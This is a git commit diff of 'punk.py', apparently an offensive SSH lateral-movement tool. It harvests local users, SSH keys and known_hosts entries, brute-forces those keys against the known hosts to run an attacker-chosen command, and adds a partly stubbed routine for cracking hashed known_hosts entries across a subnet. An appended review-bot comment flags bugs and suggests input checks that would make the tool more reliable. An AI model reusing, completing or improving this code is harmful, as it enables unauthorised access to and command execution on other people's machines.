
Commit 4444093

committed
bugfixes
1 parent 33c306b commit 4444093


1 file changed

+93
-16
lines changed


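--- a/punk.py
+++ b/punk.py
@@ -28,6 +28,7 @@
 import sys
 import threading
 import argparse
+import ipaddress
 
 try:
 import queue as queue
@@ -40,13 +41,13 @@
 success = []
 users = []
 sshKeys = []
-CMD = ""
+
 
-class WorkerThread(threading.Thread) :
+class SSHThread(threading.Thread) :
 
-def __init__(self, queue, tid, credentials) :
+def __init__(self, q, tid, credentials, CMD="") :
 threading.Thread.__init__(self)
-self.queue = queue
+self.queue = q
 self.tid = tid
 self.credentials = credentials
 
@@ -56,7 +57,7 @@ def run(self) :
 try :
 host = self.queue.get(timeout=1)
 
-except Queue.Empty :
+except queue.Empty :
 return
 
 
@@ -79,25 +80,56 @@ def run(self) :
 
 self.queue.task_done()
 
+
+class CrackThread(threading.Thread) :
+
+def __init__(self, q, tid, ips, magic, salt, hashed) :
+threading.Thread.__init__(self)
+self.queue = q
+self.tid = tid
+self.ips = ips
+self.magic = magic
+self.salt = salt
+self.hashed = hashed
+
+
+def run(self) :
+while True :
+host = None
+try :
+host = self.queue.get(timeout=1)
+
+except queue.Empty :
+return
+
+
+# TODO
+
+
+self.queue.task_done()
+
+
 class attack(object):
 
+def __init__(self, cmd):
+self.cmd = cmd
 
 def run(self):
 
-queue = Queue.Queue()
-credentials = Queue.Queue()
+q = queue.Queue()
+credentials = queue.Queue()
 
 threads = []
 for i in range(1, len(knownHosts)) : # Number of threads
-worker = WorkerThread(queue, i, credentials)
+worker = SSHThread(q, i, credentials, self.cmd)
 worker.setDaemon(True)
 worker.start()
 threads.append(worker)
 
 for host in knownHosts:
-queue.put(host)
+q.put(host)
 
-queue.join()
+q.join()
 
 # wait for all threads to exit
 if not credentials.empty():
@@ -111,6 +143,47 @@ def run(self):
 return out[0], out[1] # Output attack: user, host
 
 
+
+
+
+class crack_host(object):
+
+def __init__(self, host_string, subnet):
+""" crack an encrypted known host """
+
+self.magic = host_string.split("|")[0]
+self.salt = host_string.split("|")[1]
+self.hashed = host_string.split("|")[2]
+self.subnet = ipaddress.ip_network(subnet)
+
+def run(self):
+
+q = queue.Queue()
+ips = queue.Queue()
+
+threads = []
+for i in range(1, 4) : # Number of threads
+worker = CrackThread(q, i, ips, self.magic, self.salt, self.hashed)
+worker.setDaemon(True)
+worker.start()
+threads.append(worker)
+
+for host in self.subnet.hosts():
+q.put(str(host))
+
+q.join()
+
+# wait for all threads to exit
+if not ips.empty():
+out = (ips.get()).split(":")
+else:
+return False
+
+for item in threads :
+item.join()
+
+return out[0], out[1] # Output attack: user, host
+
 def discovery(args):
 # Search users, SSH keys and known hosts
 
@@ -147,10 +220,12 @@ def discovery(args):
 
 if args.crack != "":
 # crack the hashed known hosts
-sys.stdout.write ("TODO")#+host)
+sys.stdout.write ("\033[92m[*]\033[0m Cracking known host on %s/.ssh/known_hosts...\033[0m\n" % home )
+crack_host(host, args.crack)
+sys.stdout.write ("\033[92m[*]\033[0m done.\n")
 
 if encrypted_knownhosts and args.crack == "":
-sys.stdout.write ("\033[93m[!]\033[0m Encrypted known host at \033[93m%s" % home + "/.ssh/known_hosts\033[0m\n")
+sys.stdout.write ("\033[93m[!]\033[0m Encrypted known host at \033[93m%s/.ssh/known_hosts\033[0m\n" % home )
 sys.stdout.write ("\033[93m[!]\033[0m Run with \033[93m--crack\033[0m flag to break it\n")
 
 
@@ -191,18 +266,21 @@ def discovery(args):
 
 if args.crack != "":
 # crack the hashed known hosts
-sys.stdout.write ("TODO")#+host)
+sys.stdout.write ("\033[92m[*]\033[0m Cracking known host on %s/.ssh/known_hosts...\033[0m\n" % home )
+crack_host(host, args.crack)
+sys.stdout.write ("\033[92m[*]\033[0m done.\n")
 
 
 if encrypted_knownhosts and args.crack == "":
-sys.stdout.write ("\033[93m[!]\033[0m Encrypted known host at \033[93m%s" % args.home + homes + "/.ssh/known_hosts\033[0m\n")
+sys.stdout.write ("\033[93m[!]\033[0m Encrypted known host at \033[93m%s/.ssh/known_hosts\033[0m\n" % args.home )
 sys.stdout.write ("\033[93m[!]\033[0m Run with \033[93m%s--crack\033[0m flag to break it\n")
 
 FK.close()
 
 return True
 
 
+
 if __name__ == "__main__":
 
 sys.stdout.write ("""\033[92m
@@ -258,8 +336,7 @@ def discovery(args):
 sys.stdout.write ("\t"+host)
 
 sys.stdout.write ("\n\033[92m[*]\033[0m Starting keys bruteforcing...\n")
-CMD = args.run
-Attack = attack()
+Attack = attack(args.run)
 
 Attack.run()
 sys.stdout.write ("\033[92m[*]\033[0m Attack Complete!\n")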
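Review bot: `crack_host(host, args.crack)` at new lines 224 and 270 only constructs the object: `run()` is never called and no result reaches `discovery()`, yet `done.` is printed unconditionally, so the output reports work that never happened. The constructor (new lines 151-157) also trusts both inputs: it indexes `host_string.split("|")` three times with no length check, and `ipaddress.ip_network(subnet)` raises `ValueError` for a malformed `--crack` value or one with host bits set, neither of which is caught in the visible lines. I would split once with `parts = host_string.split("|")`, reject a line that does not have the expected number of fields, and wrap the network parse in `try: ... except ValueError:` with a clear message before any thread is started. In the second branch the new message at line 269 formats `home`, and line 275 drops `homes` from the path that old line 198 built as `args.home + homes`, so the printed path may be wrong or `home` may be unbound there. `discovery()` starts and ends outside these hunks, so that needs confirming against the full function.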
